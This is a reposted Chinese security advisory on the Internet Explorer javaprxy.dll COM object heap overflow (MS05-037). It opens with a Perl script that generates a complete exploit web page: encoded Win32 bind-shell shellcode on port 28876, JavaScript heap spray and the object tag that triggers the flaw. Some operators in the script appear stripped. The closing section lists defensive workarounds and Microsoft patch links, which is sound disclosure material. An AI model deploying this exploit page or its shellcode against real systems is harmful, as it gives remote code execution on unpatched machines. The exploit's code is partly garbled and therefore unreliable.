Microsoft IE javaprxy.dll COM对象实例化堆溢出…

# FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
# details.
#
# A copy of the GNU General Public License can be found at:
# http://www.gnu.org/licenses/gpl.html
# or you can write to:
# Free Software Foundation, Inc.
# 59 Temple Place - Suite 330
# Boston, MA 02111-1307
# USA.
#
######################################################

# header
my $header = "<html><body>\n<SCRIPT language=\"javascript\">\n";

# Win32 bindshell (port 28876) - SkyLined
my $shellcode = "shellcode = unescape(\"%u4343\" \"%u4343\" \"%u43eb".
"%u5756%u458b%u8b3c%u0554%u0178%u52ea%u528b%u0120%u31ea".
"%u31c0%u41c9%u348b%u018a%u31ee%uc1ff%u13cf%u01ac%u85c7".
"%u75c0%u39f6%u75df%u5aea%u5a8b%u0124%u66eb%u0c8b%u8b4b".
"%u1c5a%ueb01%u048b%u018b%u5fe8%uff5e%ufce0%uc031%u8b64".
"%u3040%u408b%u8b0c%u1c70%u8bad%u0868%uc031%ub866%u6c6c".
"%u6850%u3233%u642e%u7768%u3273%u545f%u71bb%ue8a7%ue8fe".
"%uff90%uffff%uef89%uc589%uc481%ufe70%uffff%u3154%ufec0".
"%u40c4%ubb50%u7d22%u7dab%u75e8%uffff%u31ff%u50c0%u5050".
"%u4050%u4050%ubb50%u55a6%u7934%u61e8%uffff%u89ff%u31c6".
"%u50c0%u3550%u0102%ucc70%uccfe%u8950%u50e0%u106a%u5650".
"%u81bb%u2cb4%ue8be%uff42%uffff%uc031%u5650%ud3bb%u58fa".
"%ue89b%uff34%uffff%u6058%u106a%u5054%ubb56%uf347%uc656".
"%u23e8%uffff%u89ff%u31c6%u53db%u2e68%u6d63%u8964%u41e1".
"%udb31%u5656%u5356%u3153%ufec0%u40c4%u5350%u5353%u5353".
"%u5353%u5353%u6a53%u8944%u53e0%u5353%u5453%u5350%u5353".
"%u5343%u534b%u5153%u8753%ubbfd%ud021%ud005%udfe8%ufffe".
"%u5bff%uc031%u5048%ubb53%ucb43%u5f8d%ucfe8%ufffe%u56ff".
"%uef87%u12bb%u6d6b%ue8d0%ufec2%uffff%uc483%u615c%u89eb\");\n";

# Memory
my $code = "bigblock = unescape(\"%u0D0D%u0D0D\");\n".
"headersize = 20;\n".
"slackspace = headersize shellcode.length\n".
"while (bigblock.length<slackspace) bigblock =bigblock;\n".
"fillblock = bigblock.substring(0, slackspace);\n".
"block = bigblock.substring(0, bigblock.length-slackspace);\n".
"while(block.length slackspace<0x40000) block = block block fillblock;\n".
"memory = new Array();\n".
"for (i=0;i<750;i ) memory[i] = block shellcode;\n".
"</SCRIPT>\n";

# javaprxy.dll
my $clsid = '03D9F3F2-B0E3-11D2-B081-006008039BF0';

# footer
my $footer = "<object classid=\"CLSID:".$clsid."\"></object>\n".
"Microsoft Internet Explorer javaprxy.dll COM Object Remote Exploit\n".
"by the FrSIRT < http://www.frsirt.com >\n".
"Solution - http://www.frsirt.com/english/advisories/2005/0935".
"</body><script>location.reload();</script></html>";

# print "Content-Type: text/html;\r\n\r\n"; # if you are in cgi-bin
print "$header $shellcode $code $footer";

建议：

---

临时解决方法：

如果您不能立刻安装补丁或者升级，NSFOCUS建议您采取以下措施以降低威胁：

* 禁止在IE中运行Javaprxy.dll COM对象；

* 将Internet和本地intranet安全区设置为“高”，以便在这些区中运行ActiveX控件前要求提示；

* 更改Internet Explorer在运行ActiveX控件前要求提示，或在Internet和本地intranet安全区中禁用ActiveX控件；

* 注销Javaprxy.dll COM对象；

* 将Javaprxy.dll的访问控制列表修改得更加受限制；

* 使用软件限制策略在IE中限制对Javaprxy.dll的访问；

* 使用Java删除工具从系统中删除Microsoft Java虚拟机。

厂商补丁：

Microsoft
---------
Microsoft已经为此发布了一个安全公告（MS05-037）以及相应补丁:
MS05-037：Vulnerability in JView Profiler Could Allow Remote Code Execution (903235)
链接：http://www.microsoft.com/technet/security/Bulletin/MS05-037.mspx#EEBABUAA

补丁下载：


Microsoft Windows 2000 Service Pack 4上的Internet Explorer 5.01 Service Pack 4:
http://www.microsoft.com/downloads/details.aspx?FamilyId=25982E02-EC6D-44CE-82DE-12DDEF1ADDD6

Microsoft Windows 2000 Service Pack 4或Microsoft Windows XP Service Pack 1上的Internet Explorer 6 Service Pack 1:
http://www.microsoft.com/downloads/details.aspx?FamilyId=2A506C16-01EF-4060-BCF8-6993C55840A9

Microsoft Windows XP Service Pack 2的Internet Explorer 6:
http://www.microsoft.com/downloads/details.aspx?FamilyId=C1381768-6C6D-4568-97B1-600DB8798EBF

Microsoft Windows Server 2003和Microsoft Windows Server 2003 Service Pack 1的Internet Explorer 6:

标签：

版权申明：本站文章部分自网络，如有侵权，请联系：west999com@outlook.com
特别注意：本站所有转载文章言论不代表本站观点，本站所提供的摄影照片，插画，设计作品，如需使用，请与原作者联系，版权归原作者所有